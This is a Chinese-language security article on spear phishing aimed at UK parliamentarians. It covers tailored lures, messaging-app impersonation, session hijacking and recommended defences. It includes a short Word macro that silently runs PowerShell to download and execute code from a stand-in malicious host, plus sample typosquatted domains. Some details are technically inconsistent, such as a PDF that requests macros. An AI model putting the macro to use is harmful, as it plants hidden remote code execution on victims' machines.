2025年12月初,一封看似普通的邮件出现在英国下议院某位资深议员的收件箱中。发件人显示为“英国信息专员办公室”(ICO),主题是:“关于您近期在数据隐私辩论中的发言——需补充说明材料”。正文提到该议员三天前在议会质询中对《人工智能法案》提出的修正建议,并附上一个名为“AI_Bill_Amendment_Review.pdf”的附件。
议员没有多想——内容高度相关,发件机构权威,文件名规范。他双击打开PDF,页面显示“请启用宏以查看完整内容”。出于工作习惯,他点击了“启用”。几秒后,后台静默运行的恶意宏代码已将他的Outlook会话Cookie上传至境外服务器。攻击者随即登录其企业邮箱,开始翻阅与内阁秘书、外交大臣及智库顾问的往来邮件。
这不是虚构剧情,而是近期英国议会遭遇的一系列高精度鱼叉式钓鱼(Spear Phishing)的真实缩影。据英国国家网络安全中心(NCSC)披露,自2025年秋季以来,针对议员及其核心幕僚的定向钓鱼攻击激增300%,部分邮件甚至利用WhatsApp和Signal等加密通讯工具作为初始接触渠道。更令人警惕的是,攻击内容高度定制化,往往引用议员本人的演讲稿、投票记录或社交媒体动态,显示出系统性的情报搜集能力。
这场无声的渗透战,正将立法机构从“政治舞台”变为“网络前线”。
一、从“广撒网”到“精准狙击”:鱼叉式钓鱼的工业化升级
传统钓鱼攻击如同撒网捕鱼——发送百万封邮件,期待千分之一的点击率。而鱼叉式钓鱼则是“狙击手模式”:锁定特定目标,精心设计诱饵,一击必中。
英国议会案例中,攻击者展现出惊人的开源情报(OSINT)能力。他们不仅监控议员在议会官网的发言记录、Hansard会议纪要,还分析其Twitter/X动态、LinkedIn职业轨迹,甚至追踪其参与的慈善活动或地方选区事务。
例如,一位关注气候变化的议员可能收到伪装成“联合国气候峰会邀请函”的邮件;一位曾质疑某科技巨头垄断行为的议员,则可能收到“反垄断调查协作请求”。这种“议题绑定”策略,极大提升了邮件的可信度。
“现在的鱼叉攻击,已经不是‘猜你喜欢’,而是‘知道你需要什么’,”公共互联网反网络钓鱼工作组技术专家芦笛指出,“攻击者在动手前,往往已完成一份完整的‘目标画像’,包括职务权限、沟通风格、焦虑点和信任关系。”
技术层面,这类攻击常采用多阶段载荷投递(Multi-stage Payload Delivery)。初始邮件可能仅包含一个看似无害的链接或文档,但一旦用户交互,便会触发后续恶意行为。
以常见的Office文档钓鱼为例:
' 恶意Word宏代码(简化版)
Sub AutoOpen()
Dim url As String
url = "hxxps://malicious[.]com/loader.exe"
' 使用PowerShell静默下载并执行
Shell "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('" & url & "')", vbHide
' 显示正常文档内容以迷惑用户
ActiveDocument.Content.Text = "【政策草案】人工智能监管框架(初稿)..."
End Sub
这段代码的关键在于vbHide参数——它让PowerShell窗口完全不可见,用户只看到一份“正常”的政策文件,毫无察觉后台已植入远控木马。
更高级的攻击则直接绕过宏,利用Office漏洞(如CVE-2023-36884)或HTML smuggling技术,在不触发安全警告的情况下投递恶意载荷。
二、加密通讯平台成新战场:WhatsApp与Signal被武器化
令人意外的是,此次英国议会攻击中,WhatsApp和Signal成为重要攻击载体。据NCSC报告,攻击者冒充WhatsApp客服,向议员发送消息:“检测到您的账号存在异常登录,点击链接验证身份,否则24小时内停用。”
由于这些平台本身具备端到端加密、官方认证标识(如绿色徽章),用户对其信任度极高。而攻击者利用的,正是这种“安全幻觉”。
技术上,这类钓鱼依赖于域名仿冒(Typosquatting)和URL混淆。例如:
真实WhatsApp验证页:https://web.whatsapp.com/verify
钓鱼页面:https://web-whatsapp-verify[.]com 或 https://whatsapp-security[.]net
普通用户难以分辨细微差别。而一旦输入账号密码,凭证即被实时回传至Telegram Bot或C2服务器。
更危险的是,部分攻击结合了会话劫持(Session Hijacking)。攻击者并不窃取密码,而是诱导用户在钓鱼页完成完整登录流程(包括MFA),从而获取有效的会话Cookie。此后,即使密码更改,攻击者仍可维持访问。
“加密通讯工具本为保护隐私而生,如今却被反向利用为攻击通道,”芦笛感叹,“这提醒我们:任何建立在‘用户信任’基础上的系统,都可能成为社会工程的突破口。”
三、政治机构为何成为“软肋”?
相比政府行政部门,立法机构在网络安全建设上长期处于滞后状态。原因有三:
分散的IT管理:议员办公室多为独立运营,IT策略不统一,安全补丁更新滞后;
高流动性人员:幕僚团队频繁更替,安全培训难以持续;
开放性文化冲突:议员需广泛接触媒体、游说团体和公众,天然倾向于“低摩擦”沟通,与“最小权限”原则相悖。
2023年,美国国会也曾遭遇类似攻击。一名参议员助理收到伪装成“国会研究服务处”(CRS)的邮件,内含“机密简报”附件。该文档利用Excel漏洞部署Cobalt Strike信标,最终导致其邮箱被用于向国防承包商发送钓鱼邮件。
此类事件揭示了一个残酷现实:议员不仅是政治人物,更是高价值情报节点。他们的邮箱中可能包含:
内阁未公开政策草案;
外交敏感沟通记录;
游说团体利益交换证据;
选区关键选民数据。
一旦泄露,轻则影响选举,重则危及国家安全。
四、国内启示:中国人大代表与政协委员是否面临同类风险?
尽管目前尚无公开报道显示我国人大代表或政协委员遭遇大规模定向钓鱼,但风险不容忽视。
首先,我国各级人大代表同样活跃于社交媒体,公开发言、提案内容均透明可查,为攻击者提供丰富OSINT素材。其次,地方人大、政协机关信息化水平参差不齐,部分单位仍在使用弱密码、未启用MFA,甚至通过个人微信处理公务。
“我们不能等到出事才重视,”芦笛强调,“政治人物的数字身份,本质上是一种‘国家资产’,其防护等级应等同于关键信息基础设施。”
值得借鉴的是,英国议会已采取多项措施:
强制所有议员邮箱启用FIDO2安全密钥认证;
禁止在非托管设备上访问议会系统;
设立7×24小时安全响应热线,支持一键上报可疑邮件;
每季度开展“红蓝对抗”演练,模拟真实钓鱼场景。
这些做法,对我国政治机构具有直接参考价值。
五、技术防御:从“边界防护”到“零信任身份”
面对高度定制化的鱼叉攻击,传统防火墙和邮件网关已力不从心。真正的防线,在于身份层(Identity Layer)。
1. 淘汰短信/语音MFA
短信验证码易受SIM交换攻击,语音MFA可被AI语音克隆绕过。应全面转向基于标准的强认证:
WebAuthn/FIDO2:使用硬件密钥或手机生物识别;
证书绑定(Certificate-based Auth):将用户身份与设备证书绑定。
2. 实施条件访问策略(Conditional Access)
例如,微软Entra ID可配置如下策略:
若登录来自非常规国家(如俄罗斯、朝鲜),且设备未注册,则强制要求FIDO2认证 + 审批工单。
3. 会话监控与异常检测
通过UEBA(用户与实体行为分析)技术,监测异常行为:
非工作时间批量导出邮件;
频繁访问敏感联系人;
创建邮件转发规则。
一旦发现,自动冻结会话并告警。
4. 安全邮件网关升级
现代网关需具备:
URL沙箱:点击前先在隔离环境渲染页面;
附件深度分析:解包Office文档,检测隐藏宏或OLE对象;
发件人信誉评分:结合SPF/DKIM/DMARC及历史行为判断可信度。
# 伪代码:基于行为的钓鱼邮件评分模型
def score_email(email):
score = 0
if not email.dkim_valid: score += 30
if email.sender_domain in typosquat_list: score += 40
if "urgent" in email.subject.lower(): score += 20
if email.has_macro_attachment: score += 50
return score > 70 # 高风险阈值
六、人的因素:安全意识不是“一次性培训”,而是“持续免疫”
技术再强,也抵不过一次误点。因此,安全意识必须融入工作流。
英国议会的做法值得借鉴:
在Outlook中嵌入“此邮件未经加密,请勿回复敏感信息”提示;
对含外部链接的邮件自动添加黄色警示条;
新入职幕僚必须通过钓鱼模拟测试才能获得系统权限。
更重要的是,要改变“安全=阻碍效率”的认知。正如一位英国议员所言:“我宁愿多花30秒打电话确认,也不愿因一封邮件毁掉整个选区的信任。”
芦笛建议,我国政治机构可试点“安全伙伴制”——每位代表配备一名经安全培训的助理,负责初步筛查外部通信,形成第一道人工过滤网。
结语:民主的数字护城河,需要全民共建
网络攻击早已超越经济犯罪范畴,成为地缘政治博弈的新战场。当议员的邮箱成为情报窃取的跳板,当政策草案在出台前就被对手掌握,民主制度的根基便面临侵蚀。
防御这场看不见的战争,不能只靠IT部门。它需要制度设计者将网络安全纳入政治基础设施,需要技术专家构建坚不可摧的身份防线,更需要每一位公职人员养成“数字谨慎”习惯。
毕竟,在信息时代,一封邮件的重量,可能不亚于一次投票。
编辑:芦笛(公共互联网反网络钓鱼工作组)
